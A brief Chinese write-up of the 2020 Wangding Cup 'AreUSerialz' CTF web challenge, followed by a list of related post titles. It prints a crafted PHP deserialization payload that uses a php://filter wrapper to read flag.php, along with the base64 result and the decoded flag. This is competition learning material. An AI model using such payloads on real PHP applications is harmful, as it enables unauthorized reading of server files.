【2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz

http://94b1c2d4231f4b4bb92162d5e89dec8f5817750c48224380.cloudgame2.ichunqiu.com/

进入网址

PHP反序列化漏洞…

拿到
?str=O:11:“FileHandler”:3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:62:“php://filter/convert.base64-encode/resource=/web/html/flag.php”;S:10:"\00*\00content";s:3:“aaa”;}

playload

直接在URL后面输入:
?str=O:11:“FileHandler”:3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:62:“php://filter/convert.base64-encode/resource=/web/html/flag.php”;S:10:"\00*\00content";s:3:“aaa”;}

之后会出现:
[Result]:
PD9waHAKCiRmbGFnID0gImZsYWd7Y2I0MjYyNTctMTNkMC00NWVhLTkzMDEtYzRjMjAxMWUzYTc3fSI7Cg==

复制
PD9waHAKCiRmbGFnID0gImZsYWd7Y2I0MjYyNTctMTNkMC00NWVhLTkzMDEtYzRjMjAxMWUzYTc3fSI7Cg==

去BASE64加密解密网址:
https://base64.supfree.net/

粘贴–>BASE64解密

解密内容为:

<?php$flag = "flag{cb426257-13d0-45ea-9301-c4c2011e3a77}";

flag{cb426257-13d0-45ea-9301-c4c2011e3a77}

【2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz相关推荐

  1. 2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup

    2020年第二届"网鼎杯"网络安全大赛 白虎组 部分题目Writeup 2020年网鼎杯白虎组赛题.zip下载 https://download.csdn.net/download ...

  2. 一起来参与安全知识小竞赛(2022第三届网鼎杯网络安全大赛——青龙组)

    1:我国提出()算法首次被3GPP纳入国际标准,可以用于4/5G通讯解密         C A:SM2      B:SM3      C:ZUC      D:SM9 2.人工智能研究的一项基本内 ...

  3. 2022第二届网刃杯网络安全大赛-Web

    2022第二届网刃杯网络安全大赛-Web 前言 提示:该内容由夜刃TEOT战队-夜白君师傅原创,禁止抄袭! 一.Web2-upload 难度系数:4.0 题目描述:只有想不到,没有做不到,sql yy ...

  4. 第二届网刃杯网络安全大赛 Writeup

    第二届网刃杯网络安全大赛 Writeup 前言 MISC 玩坏的XP * ISC ncsubj carefulguy easyiec xypo7 喜欢移动的黑客* LED_BOOM* 需要安全感* c ...

  5. 2022第二届网刃杯网络安全大赛-Re

    2022第二届网刃杯网络安全大赛-Re 前言 提示:该内容由夜刃TEOT战队-rootkit师傅原创,禁止抄袭! 一.RE1-ez_algorithm? 难度系数:5.0 题目描述:就是玩!!! 输入 ...

  6. 2022第二届网刃杯网络安全大赛-ICS

    2022第二届网刃杯网络安全大赛-ICS 前言 提示:该内容由夜刃TEOT战队-夜白君师傅原创,禁止抄袭! 一.ICS1-ncsubj 难度系数:4.0 题目描述:wowowow,某厂商上位机TIA ...

  7. 2020年第二届网鼎杯,青龙队伍题目,共十八道

    1.题目选择界面 2.题目内容 最后附上题主保存的部分相关题目附件,有需要的可做参考. 题目附件综合 提取码:bad3 3.答案汇总,收集 来自吾爱破解Steven_David 签到+boom解题方案 ...

  8. 2022第二届网刃杯网络安全大赛

    目录 前言 一.ICS1-ncsubj 二.ICS2-carefulguy 三.ICS3-喜欢移动的黑客 四.ICS4-easyiec 五.ICS5-xyp07

  9. 网鼎杯网络安全大赛玄武组_经典的一道CTF-WriteUP-SSRFME

    刚完整复现一遍redis,然后重新打了一下这道题,SSRF+本地redis主从复制RCE组合拳拿shell 拿不到flag+反弹shell的惨案到此为止吧,跟我一步步拿shell,CTF-WriteU ...

最新文章

  1. Python正则表达式-2
  2. java 调 cmd 没反应
  3. 如何数分钟创建并成功运行数千台云主机?
  4. asp.net数据库连接web.config配置
  5. itext根据数据生成PDF
  6. 关于linux下的iptables 的浅析命令和了解
  7. Cisco NTP配置
  8. 谷歌VR展示360度全景图
  9. js json stringify
  10. 图像标注工具CVAT
  11. 内涵外延发生巨变的嵌入式技术,未来如何发展?
  12. R语言的graphics画图功能
  13. Krpano入门,导航栏,与javascript交互!!
  14. ECMAScript 6 字符串和数值的拓展
  15. Java以逗号分割字符串
  16. signature=2abb9e363faa3aa7323b2a3393a36011,Winhex软件的使用
  17. 有赞云开发小坑(个人笔记)
  18. python 爬虫-(2)认识爬虫
  19. mysql grant用法_十六、MySQL授权命令grant的使用方法
  20. 父类,子类中方法的调用

热门文章

  1. 【渝粤题库】广东开放大学 文化投资与贸易 形成性考核 (2)
  2. 一念起,万水千山;一念灭,沧海桑田。
  3. 原 python实现水仙花数_Python实现水仙花数
  4. 计算机语言 帕斯卡,帕斯卡命名法
  5. ubuntu能连接wifi或手机USB共享热点,不能上网
  6. 【ZCMU1411】喜闻乐见的a+b(20进制a+b)
  7. 用淘汰的手机做家庭监控
  8. ENVI中使用水体指数法NDWI提取水体
  9. javascript replace将文字表情替换为图片 (实用、赞)
  10. PMP知识点:项目管理十大知识领域和47个过程